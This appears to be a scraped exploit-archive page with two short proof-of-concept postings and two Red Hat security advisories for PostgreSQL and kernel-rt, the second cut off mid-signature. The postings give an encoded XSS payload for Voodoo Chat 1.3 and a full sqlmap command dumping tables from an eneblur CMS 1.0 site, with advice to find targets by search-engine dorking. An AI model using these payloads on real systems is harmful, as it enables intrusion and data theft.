Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 11f7a2efbdf14e9500b0a6e971a896bbac171caeed20cc661f2b4ad1b5c02e2e

Download | Favorite | View

**Voodoo Chat 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Voodoo Chat v1.3 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.swalif.net/softs/swalif30/softs258256/#post1850068                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0[+] http://127.0.0.1/groupsyriacom/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Voodoo Chat 1.3 Cross Site Scripting

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

**eneblur CMS 1.0 SQL Injection**

Posted Aug 8, 2023

Authored by indoushka

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 4d67639c944054e33175ed2e55a36b45439dd449f6e73134fe454cc1d6a7bb71

Download | Favorite | View

**eneblur CMS 1.0 SQL Injection**

    ====================================================================================================================================| # Title     : eneblur CMS 1.0 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://www.eneblur.com/web-application-development.php                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /journal_details.php?jid= <===== inject here [+] D:\sqlmap>sqlmap.py -u http://127.0.0.1/wenvirobiotechjournalscom/journal_details.php?jid=3 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D envirobi_portal_server3Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eneblur CMS 1.0 SQL Injection

Red Hat Security Advisory 2023-4527-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:13 security update  
Advisory ID:       RHSA-2023:4527-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4527  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:13 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.src.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.src.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-13.11-1.module+el8.8.0+19081+0a277c66.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k8pAAoJENzjgjWX9erE+eYQAJRHA0QdZv5xV9TWliWdsitH  
6tP5HpsBibR5c1ZZTYGULESqi1fiiDa2qD9rvT0bY+17LdhfSofd57OqUT+SCI1g  
AQ5umKalGbrpvNQ86FJ90UjTpASSdP3cCrdZ8cvJbyNgvjE+pQmkH4rJUxz1PD1j  
6dI+TLEsRSspOADDeuDESuLEwV6IYezmraPoLFyNr6+fE8Byfldf7tTFqu0PT8pD  
edQiQqRfbRSK2MiVQPWFdBlfHbLLUzzMl+IYIyCWDGdAglsnqOQqQUyGoH1b+gKd  
O/TauZ8kV1t9KlJSdo5GJFWrY6nULBunrB3uRWEi7iV+WtqF1oc/42HhcZ+PDKFd  
H/uDTAek+QiCuKJqpnGnwDf+gTUQupvlSN6+1hHSr/VN0j4IL1s0CJ6n1DIXj4Wv  
ewHllUnsUzstH6fA/tDOx31MBsEUPgb3HNagHjuwNf+kBeGAVDFWTaMlk082NgX5  
5fa2PrgpqQQQ6fvwBypoPhiqlnuevJW+FRSyqPNcSGg0b1o7BGbNqsXQG7mPKikt  
e7HpJ/9IHDMHXJG4jI3Dz4xe17xFSC9P+YWGeRHrVpoEe4ad6N0+uCYFBztaUAuv  
NCKdrDr8pTeZObDQbZ/zozirUQINLOlZW28gfHCVX3B6XD4v/NgD08PPcWziepjZ  
Bb739FMpHL9bwdagWyGU  
=+g0V  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4527-01

Red Hat Security Advisory 2023-4541-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include out of bounds access, out of bounds write, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:4541-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4541  
Issue date:        2023-08-08  
CVE Names:         CVE-2022-42896 CVE-2023-1281 CVE-2023-1829   
                   CVE-2023-2124 CVE-2023-2194 CVE-2023-2235   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux NFV (v. 8) - x86_64  
Red Hat Enterprise Linux RT (v. 8) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

* kernel: tcindex: use-after-free vulnerability in traffic control index  
filter allows privilege escalation (CVE-2023-1281)

* kernel: Use-after-free vulnerability in the Linux Kernel traffic control  
index filter (CVE-2023-1829)

* kernel: use-after-free vulnerability in the perf_group_detach function of  
the Linux Kernel Performance Events (CVE-2023-2235)

* kernel: OOB access in the Linux kernel's XFS subsystem (CVE-2023-2124)

* kernel: i2c: out-of-bounds write in xgene_slimpro_i2c_xfer()  
(CVE-2023-2194)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Addding the building of i915 driver to 8.8 (BZ#2208276)

* kernel-rt: update RT source tree to the RHEL-8.8.z2 source tree  
(BZ#2215026)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c  
2181847 - CVE-2023-1281 kernel: tcindex: use-after-free vulnerability in traffic control index filter allows privilege escalation  
2187439 - CVE-2023-2124 kernel: OOB access in the Linux kernel's XFS subsystem  
2188396 - CVE-2023-2194 kernel: i2c: out-of-bounds write in xgene_slimpro_i2c_xfer()  
2188470 - CVE-2023-1829 kernel: Use-after-free vulnerability in the Linux Kernel traffic control index filter  
2192589 - CVE-2023-2235 kernel: use-after-free vulnerability in the perf_group_detach function of the Linux Kernel Performance Events

6. Package List:

Red Hat Enterprise Linux NFV (v. 8):

Source:  
kernel-rt-4.18.0-477.21.1.rt7.284.el8_8.src.rpm

x86_64:  
kernel-rt-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-core-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-core-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-devel-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-kvm-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-modules-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm

Red Hat Enterprise Linux RT (v. 8):

Source:  
kernel-rt-4.18.0-477.21.1.rt7.284.el8_8.src.rpm

x86_64:  
kernel-rt-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-core-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-core-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-devel-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-modules-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-477.21.1.rt7.284.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/cve/CVE-2023-1281  
https://access.redhat.com/security/cve/CVE-2023-1829  
https://access.redhat.com/security/cve/CVE-2023-2124  
https://access.redhat.com/security/cve/CVE-2023-2194  
https://access.redhat.com/security/cve/CVE-2023-2235  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0fq7AAoJENzjgjWX9erE2t4P/iR/5uz5C9klX9B1C1k7dcZb  
+S/7Z/3lbj+XH6gBPHe4lxHjPG9CsGLp1xYh5wiMY9CDGLBeqXpCJPfbcTaUoG9a  
gUr2vqCdLeM4iYnEKNEvxwRxIK6rZWbl/Qqy81ALO5lh1GQe0FNrJDXgi3QERnFy  
hfqld+jONuvX+hlbwwPzXBuFF5yMTr6boIPOL0INGLOkWbRZ11ewhzVlhbFmCvll  
d3JAKBUb7xcj1Vfe0WITmcRmMHHq93zo1c6Q+KKbTJOkH7m3jmsUS1gFrtURgH9l  
mXMr0/agaYTPNSC0yzqqImJX4/fEE83DV07faC+aYCRkjcLqlOKDoppvZgtKqJlo  
